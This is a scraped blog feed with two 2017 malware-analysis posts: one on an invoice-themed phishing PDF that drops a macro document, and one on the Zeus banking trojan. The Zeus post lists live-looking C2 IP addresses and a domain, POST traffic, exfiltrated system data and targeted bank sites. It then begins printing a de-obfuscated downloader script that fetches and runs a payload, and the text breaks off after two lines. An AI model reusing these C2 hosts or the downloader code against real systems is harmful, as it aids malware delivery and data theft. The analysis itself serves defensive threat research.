Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-37950903636807825162017-04-27T01:59:00.001-07:002017-04-27T01:59:06.499-07:00MalSpam: PDF with embedded DOCM | Invoice ThemeThis phishing campaign involved a PDF attachment (invoice or something similar) that, on execution, will drop a docm file, whichi in turn will be the downloader. In the sample I analysed for this post, the PDF turned out to be corrupt but the flow can still be seen.<br />
<br />
Yahoo did a good job of flagging the attachment as malicious, other providers might not be able to do so.<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-AjVWIp1zBEY/WQGxeYQu7xI/AAAAAAAAAFQ/Y-gO5TBRVeoU0tHpxuXNdfBHFgYhUc9ZgCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B8.08.21%2Bam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://3.bp.blogspot.com/-AjVWIp1zBEY/WQGxeYQu7xI/AAAAAAAAAFQ/Y-gO5TBRVeoU0tHpxuXNdfBHFgYhUc9ZgCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B8.08.21%2Bam.png" width="640" /></a></div>
Here's the downloaded PDF:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-0JdYfE0UM0Y/WQGx0eOSb5I/AAAAAAAAAFU/1N3gyKAn-Xo5wwmLbepbkreE4J9LuVGtACLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.33.24%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://3.bp.blogspot.com/-0JdYfE0UM0Y/WQGx0eOSb5I/AAAAAAAAAFU/1N3gyKAn-Xo5wwmLbepbkreE4J9LuVGtACLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.33.24%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://2.bp.blogspot.com/--eSuFV1JXwU/WQGyKHamq4I/AAAAAAAAAFo/IXqSotZHiW0HqmH_j6gS2nNIPKvXnbwCACLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.40.15%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://2.bp.blogspot.com/--eSuFV1JXwU/WQGyKHamq4I/AAAAAAAAAFo/IXqSotZHiW0HqmH_j6gS2nNIPKvXnbwCACLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.40.15%2Bpm.png" width="320" /></a></div>
<br />
The start of the file:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-w-8BICNmwnQ/WQGx5F_TqeI/AAAAAAAAAFY/qVVZ74AFozIVkfvDyi734Iy-pOoPX5m9QCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.20%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="https://3.bp.blogspot.com/-w-8BICNmwnQ/WQGx5F_TqeI/AAAAAAAAAFY/qVVZ74AFozIVkfvDyi734Iy-pOoPX5m9QCLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.20%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;">The PDF has the code for the embedded docm:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<a href="https://1.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/HV6B7JcQyHMLFjwtAoe00Dg7GRRM5K7iQCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://1.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/HV6B7JcQyHMLFjwtAoe00Dg7GRRM5K7iQCLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-6tRk1o34JUc/WQGyHFQebcI/AAAAAAAAAFg/XjfoqBXpMaMjJVKkLYRLfv5vLjU3Y0mwwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://4.bp.blogspot.com/-6tRk1o34JUc/WQGyHFQebcI/AAAAAAAAAFg/XjfoqBXpMaMjJVKkLYRLfv5vLjU3Y0mwwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://2.bp.blogspot.com/-BqsBCKcLabw/WQGyJ6KI6zI/AAAAAAAAAFk/ORlPDQ7A3QAEBX3YuZzX66RyJlZSTrupwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://2.bp.blogspot.com/-BqsBCKcLabw/WQGyJ6KI6zI/AAAAAAAAAFk/ORlPDQ7A3QAEBX3YuZzX66RyJlZSTrupwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-exRN7bZFHDc/WQGyKFEtpvI/AAAAAAAAAFs/n9XrbIjv7JACS3_bBoBFiN2dbu5g0GfpgCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.36.50%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://3.bp.blogspot.com/-exRN7bZFHDc/WQGyKFEtpvI/AAAAAAAAAFs/n9XrbIjv7JACS3_bBoBFiN2dbu5g0GfpgCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.36.50%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-ihL7xV_3Hyc/WQGyLHMzQOI/AAAAAAAAAFw/-33IYE5C8mwaGjN3lozpH8qkuyCRmgErwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B6.00.41%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://3.bp.blogspot.com/-ihL7xV_3Hyc/WQGyLHMzQOI/AAAAAAAAAFw/-33IYE5C8mwaGjN3lozpH8qkuyCRmgErwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B6.00.41%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/YeesZAdTRZA-zt6upH1B2mQLMZ5v6Z7wwCEw/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="628" src="https://4.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/YeesZAdTRZA-zt6upH1B2mQLMZ5v6Z7wwCEw/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I'll try to get another sample and see if I can get the doc off it and execute it for the complete analysis of this campaign. </div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-16298880749310893712017-04-26T15:13:00.000-07:002017-04-26T15:18:01.896-07:00Malware - Zeus | Apr 2017<div>
<span style="font-family: open sans, sans-serif;">Here're some of the characteristics of a current version of the Zeus Banking Malware.</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Upon execution, the process that is spawned is explorer.exe which then executes and does the job.</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zVUDrdc4xjQ/WP2LsbcLL7I/AAAAAAAAMtE/uuQrQ5UKrA8_jNrnEwO5rRF0jQKmRU2gACLcB/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.20.08%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="131" src="https://2.bp.blogspot.com/-zVUDrdc4xjQ/WP2LsbcLL7I/AAAAAAAAMtE/uuQrQ5UKrA8_jNrnEwO5rRF0jQKmRU2gACLcB/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.20.08%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">PDB files (from memory, not all are created by the malware):</span></h3>
<div>
<span style="font-family: "open sans", sans-serif;">explorer.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ntdll.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">kernel32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">kernelbase.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSqc</span></div>
<div>
<span style="font-family: open sans, sans-serif;">apphelp.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">msvcrt.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDS~S</span></div>
<div>
<span style="font-family: open sans, sans-serif;">oleaut32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSzNh</span></div>
<div>
<span style="font-family: open sans, sans-serif;">combase.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDS,9%</span></div>
<div>
<span style="font-family: open sans, sans-serif;">powrprof.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">advapi32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSGk</span></div>
<div>
<span style="font-family: open sans, sans-serif;">user32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">gdi32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">shcore.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSB*</span></div>
<div>
<span style="font-family: open sans, sans-serif;">shlwapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">shell32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSmEi? r</span></div>
<div>
<span style="font-family: open sans, sans-serif;">UxTheme.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dwmapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">twinapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">d3d11.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dcomp.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">sspicli.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">sechost.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">userenv.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">propsys.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">rpcrt4.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SLC.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">profapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dxgi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">sppc.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">imm32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">msctf.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ws2_32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">nsi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSS=[</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dnsapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDS}=</span></div>
<div>
<span style="font-family: open sans, sans-serif;">wininet.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">iertutil.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">cryptsp.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">rsaenh.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">bcrypt.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">cryptbase.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">bcryptprimitives.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">secur32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">OnDemandConnRouteHelper.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Kernel.Appcore.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">winhttp.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">urlmon.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ole32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDS9h</span></div>
<div>
<span style="font-family: open sans, sans-serif;">mswsock.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">iphlpapi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSh1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">winnsi.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">rasadhlp.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">RSDSuY</span></div>
<div>
<span style="font-family: open sans, sans-serif;">fwpuclnt.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;">comctl32.pdb</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">C2 information:</span></h3>
<div>
<span style="font-family: "open sans", sans-serif;">Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Connection: close</span></div>
<div>
<span style="font-family: open sans, sans-serif;">urlmon.dll</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ObtainUserAgentString</span></div>
<div>
<span style="font-family: open sans, sans-serif;">185.121.177.53</span></div>
<div>
<span style="font-family: open sans, sans-serif;">185.121.177.177</span></div>
<div>
<span style="font-family: open sans, sans-serif;">45.63.25.55</span></div>
<div>
<span style="font-family: open sans, sans-serif;">111.67.16.202</span></div>
<div>
<span style="font-family: open sans, sans-serif;">142.4.204.111</span></div>
<div>
<span style="font-family: open sans, sans-serif;">142.4.205.47</span></div>
<div>
<span style="font-family: open sans, sans-serif;">31.3.135.232</span></div>
<div>
<span style="font-family: open sans, sans-serif;">62.113.203.55</span></div>
<div>
<span style="font-family: open sans, sans-serif;">37.228.151.133</span></div>
<div>
<span style="font-family: open sans, sans-serif;">144.76.133.38</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">HTTP connections:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-da_ci2cAynA/WP2LyF2GScI/AAAAAAAAMtQ/SDwanMWDpHUp8qNtzn0pHKt-zeSe44dyQCEw/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.04.06%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="166" src="https://2.bp.blogspot.com/-da_ci2cAynA/WP2LyF2GScI/AAAAAAAAMtQ/SDwanMWDpHUp8qNtzn0pHKt-zeSe44dyQCEw/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.04.06%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">http://health.worldwidecons.ltd/index.php</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">/index.php</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">C:\Windows\System32\rasadhlp.dll</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LRPC-4ad3f41e1dd17fdfd8</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LRPC-4ad3f41e1dd17fdfd8</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LRPC-ce28dc8b8c59856b80</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Accept: */*</span></div>
<div>
<span style="font-family: open sans, sans-serif;">UserName</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Host: health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">http://health.worldwidecons.ltd/index.php</span></div>
<div>
<span style="font-family: open sans, sans-serif;">qqqqqqqqqqqqqqqq</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Host: health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dtl.snocediwdlrow.htlaeh</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Host: health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dtl.snocediwdlrow.htlaeh</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Host: health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">System info sent back to the C2:</span></h3>
<div>
<span style="font-family: "open sans", sans-serif;">ALLUSERSPROFILE=C:\ProgramData</span></div>
<div>
<span style="font-family: open sans, sans-serif;">APPDATA=C:\Users\User\AppData\Roaming</span></div>
<div>
<span style="font-family: open sans, sans-serif;">CommonProgramFiles=C:\Program Files\Common Files</span></div>
<div>
<span style="font-family: open sans, sans-serif;">COMPUTERNAME=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ComSpec=C:\Windows\system32\cmd.exe</span></div>
<div>
<span style="font-family: open sans, sans-serif;">FP_NO_HOST_CHECK=NO</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HOMEDRIVE=C:</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HOMEPATH=\Users\User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LOCALAPPDATA=C:\Users\User\AppData\Local</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LOGONSERVER=\\WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">NUMBER_OF_PROCESSORS=1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">OS=Windows_NT</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_ARCHITECTURE=x86</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_LEVEL=6</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_REVISION=4601</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ProgramData=C:\ProgramData</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ProgramFiles=C:\Program Files</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PUBLIC=C:\Users\Public</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SESSIONNAME=Console</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SystemDrive=C:</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SystemRoot=C:\Windows</span></div>
<div>
<span style="font-family: open sans, sans-serif;">TEMP=C:\Users\User~1\AppData\Local\Temp</span></div>
<div>
<span style="font-family: open sans, sans-serif;">TMP=C:\Users\User~1\AppData\Local\Temp</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERDOMAIN=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERNAME=User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERPROFILE=C:\Users\User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">windir=C:\Windows</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">Misc information (can be used as IOCs):</span></h3>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-fY3uumOeNBM/WP2LsSE_AAI/AAAAAAAAMtM/mcPcTqnaJh0Rb-HuKDb-OCjDmgAKXt15QCEw/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.10.38%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="254" src="https://4.bp.blogspot.com/-fY3uumOeNBM/WP2LsSE_AAI/AAAAAAAAMtM/mcPcTqnaJh0Rb-HuKDb-OCjDmgAKXt15QCEw/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.10.38%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Cookie:username@windowssearch.com/</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Cookie:username@wireshark.org/</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Connection: close</span></div>
<div>
<span style="font-family: open sans, sans-serif;">X-Powered-By: PHP/5.4.45-0+deb7u2</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY RightTeeArrow "&#x21A6;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY mapsto "&#x21A6;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY DownTeeArrow "&#x21A7;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY mapstodown "&#x21A7;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY larrhk "&#x21A9;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY hookleftarrow "&#x21A9;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY rarrhk "&#x21AA;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY hookrightarrow "&#x21AA;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY larrlp "&#x21AB;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY looparrowleft "&#x21AB;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY rarrlp "&#x21AC;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY looparrowright "&#x21AC;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY harrw "&#x21AD;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY leftrightsquigarrow "&#x21AD;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY nharr "&#x21AE;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><!ENTITY nleftrightarrow "&#x21AE;"></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;"><br /></span><span style="font-family: open sans, sans-serif;">Websites targeted</span></h3>
<div>
<span style="font-family: open sans, sans-serif;">The list is very long - they are not leaving any industry out!</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Here's just one snippet:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">aa.net.nz</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aafes.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">abm-energie.de</span></div>
<div>
<span style="font-family: open sans, sans-serif;">accretivehealth.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aceinsurance.com.au</span></div>
<div>
<span style="font-family: open sans, sans-serif;">action-inter.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">activedocs.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aeat.co.uk</span></div>
<div>
<span style="font-family: open sans, sans-serif;">afimilk.co.il</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aftonxchange.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">agencerecherche.fr</span></div>
<div>
<span style="font-family: open sans, sans-serif;">agencywow.com</span></div>
<div>
<span style="font-family: open sans, sans-serif;">akd.nl</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aksel.com.tr</span></div>
<div>
<span style="font-family: open sans, sans-serif;">albil.com.tr</span></div>
<div>
<span style="font-family: open sans, sans-serif;">allianz.hr</span></div>
<div>
<span style="font-family: open sans, sans-serif;">alturkigroup.net</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ana.co.jp</span></div>
<div>
<span style="font-family: open sans, sans-serif;">aproposgeschenk.de</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Here's one of the downloader de-obfuscated script BTW:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">The code below is the part that grabs the payload from the c2 and executes it.</span></div>
<div>
<span style="font-family: open sans, sans-serif;">---------------------------</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Windows Script Host</span></div>
<div>
<span style="font-family: open sans, sans-serif;">---------------------------</span></div>
<div>
<span style="font-family: open sans, sans-serif;">var wsh = new ActiveXObject("wscript.shell");</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">var sh = new ActiveXObject("shell.application");</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
